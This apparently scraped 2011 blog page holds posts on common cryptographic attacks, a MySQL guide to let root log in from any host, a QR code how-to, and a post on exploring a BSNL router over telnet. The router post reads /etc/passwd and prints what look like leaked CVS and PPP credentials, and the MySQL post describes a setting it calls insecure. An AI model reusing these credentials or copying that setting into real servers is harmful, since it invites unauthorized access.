Some common attacks on cryptography:

DoS-
DoS (Denial of Service) attacks are when someone tries to make a service or action incapable of usage. One very unlikely method, But possible, would be cutting the victims internet cable. This renders them incapable of accessing the said source. Although this attack is usually used on a web-server, this can also be used to stop an encryption from ever reaching its intended party. Another way this attack could be carried out would be to send a server a massive amount if request, and keeping the server busy.

Man In The Middle (MITM)-
MITM is where the attacker makes a connection with the host then passes the message to the other host, making them believe that they are talking directly to each other over a private connection although the conversation is controlled solely by the attacker. The attacker then would intercept messages and send new ones.

Birthday Attack-
In this attack you use mathematics to exploit collisions. This is a rather formidable attack because of how efficient it is, especially if the function hold a lot of matches in the psudorandom lookup of matches in collisions.

Cryptanalysis-
cryptanalysis is also known as code breaking or cracking a code. Although this does not necessarily imply encryption, it is one major part of cracking. this form usually excludes attacks such as the ones mentioned above, social engineering, burglary, or keylogging. In the past one way to crack an encryption was to use a frequency analysis, or seeing what type of characters appear most. For instance the letter "E" is the most common in English, and the digraph "TH" is the most common. In practice it relies on as much linguistic knowledge as it does statistics. As encryption got more and more detailed, mathematics became more of a major player in cracking. In modern times the advanced computations in an encryption have made cryptanalysis less of a key player, than in the past when pen-and-paper encryptions were used.
So in order to sum this up, I will use this quote.
"Breaking a cipher simply means finding a weakness in the cipher that can be exploited with a complexity less than brute force. Never mind that brute-force might require 2^128 encryptions; an attack requiring 2^110 encryptions would be considered a break...simply put, a break can just be a certificational weakness: evidence that the cipher does not perform as advertised." (Schneier, 2000).

Saturday, 20 August 2011

MySql: Give Root User Logon Permission From Any Host

Note that this is Not very secure, and should only be used for a local development box where you don’t feel like setting up individual permissions, but still need to connect from other machines.
To configure this feature, you’ll need to update the mysql user table to allow access from any remote host, using the % wildcard.
Open the command-line mysql client on the server using the root account.
mysql -uroot
Then you will want to run the following two commands, to see what the root user host is set to already:
use mysql;
select host, user from user;
Here’s an example of the output on my database, which is pretty much the default settings. Note that ubuntuserv is the hostname of my server.
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select host,user from user;
+—————+——————+
| host | user |
+—————+——————+
| ubuntuserv | root |
| localhost | debian-sys-maint |
| localhost | root |
+—————+——————+
3 rows in set (0.00 sec)
Now I’ll update the ubuntuserv host to use the wildcard, and then issue the command to reload the privilege tables. If you are running this command, substitute the hostname of your box for ubuntuserv.

update user set host=’%’ where user=’root’ and host=’ubuntuserv’;
flush privileges;
That’s all there is to it. Now I was able to connect to that server from any other machine on my network, using the root account.
Again, note this isn’t very secure, and you should at least make sure that you’ve set a root password.

What is a QR code ? How to make a QR code ? How to Decrypt a QR code ??

A QR code ( Quick Response) is a specific matrix barcode or two-dimensional code, readable by QR barcode readers and camera phones. The code consists of black modules arranged in a square pattern on a white background. The information encoded can be text, URL or other data. This is How a QR code Looks like





How to Make a QR Code For You ???

Step 1 – Goto http://qrcode.kaywa.com

You can see something like that Select the content type as you wish . if you want to add a Url on QR code select url and add your URL and Press on the size if you want to make Size Small , medium or Large then Press the Generate Button Then You can see some thing like this when you Press the Generate Button

Download the QR code image on Computer . That all you had owned a QR code now
If you want to Decrypt a QR Code ???


Step 1 – goto http://zxing.org/w/decode.jspx

Then you can see something like that
Click Browse and Uplod the picture to the website and you can decrypt it and there are many other methods to decrypt QR code .The Device which to Decrypt QR code are QR barcode readers and camera phones with QR CODE Reader Application on it . in here am showing how to decrypt the QR Code on PC . You take Photos of QR code on your camera and Decrypt with this website too

Thursday, 18 August 2011

Hacking into the BSNL Router using Android

Recently I was at home, playing with my BSNL router. For those who don't know what BSNL is, its the AT & T of India, known for very bad customer support :)
 
 
In this article, I will walk you through step by step illustrations on how to hack into your local router and explore it inside out. Though I am using my BSNL router here but steps and method will be similar for your modem/router as well.
 
 
 
Router Configuration

BSNL router is manufactured by SemIndia and distributed by ITI. It follows the tracks of using firmware of different routers (Broadcom to be specific, BCM6338 stands for Broadcom router firmware version 96338, deployed in US robotics ones and some other popular routers). Mine is DNA-A211-1, one of most popular ones in India.
 
 
Hacking Router with Android
 
I didn't had a PC (trashed due to burnt ram), so I have to do everything on my Android. Though the screenshots are small, it is great to see that you can hack anywhere at any time using Android mobile.

To start with, I telnet into my router with my credentials and I am greeted with welcome screen as shown in screen below,
 
 
Once you are in, first step will be to figure out what are the services it has to offer, so I typed the usual 'help' and found following commands. 
 
 
 
I started with basic command, "swversion" to get the version. Then with some hunting, I came to know that "sh" command runs over my router, ran it and voila, familiar interface of busybox snaps in.  
 
 
 
Great, now thats worth something. For those who don't know hat busybox is, its a multicall binary. My android has it too. Seeing the version made me tick, it was running an older version of busybox.


Then I tried ls command, but it didn't work, hence tried "echo *" and it showed up everything as seen below  
 
 
 
Next comes the magic command "cat /etc/passwd" and there we go again. 
 
 
 
After that, I went on exploring other directories. Got into CVS and found information regarding CVS and pserver, note worthy one is the credentials of pserver. 
 
pserver:xyzabc@192.168.128.19:/home/cvsroot 
 
Not much of an interest though as they are of a private LAN. On googling, I found out that account belonged to XYZ (name changed for privacy), employee at SIEMIndia.

Next, I moved on to /etc directory, 
 
 
 
lots of directories here, as a rule of thumb I opened default.cfg 
 
 
 
Generic stuff, but what caught my eye was this line,  
 
ppp_conId1 userName="multiplay" password="kIMa1bXVsdGlwbGF51AG" 
 
This might come in handy (use your creativity :)).


But then I thought that why not to access the router from web interface. Logged in to it and then went to "management" and downloaded the backupsettings.conf file,
 
 
 
On opening, it was like as shown below,  
 
 
 
I was not able to find the above credentials in it, hence I came to a conclusion that they must be somewhat for internal purposes.


Moving on, I thought why not to try to create an arbitrary file . Tried following command  
 
echo 'rishrockz' >> rdx 
 
 
 
But it failed. It was not easy to figure out the writable directory as I was not able to determine the file permissions since this version of busybox doesn't has ls or stat command.

Finally little bit of exploring found that /var is writable. Tried creating a file again, it succeeded ! 
 
 
 
Well, there is lot more to explore, this is just tip of iceberg! Next time I am be thinking of going to compile programs (http://people.debian.org/~debacle/cross/) and copying over them using echo (once I get a PC), I have got some nice ideas and will be hacking with them.


In the mean time, for those who are wondering what this machine has, here is the bootup log. 
 
 

Twitter Delicious Facebook Digg Stumbleupon Favorites More

Adverts

BannerAd BannerAd BannerAd BannerAd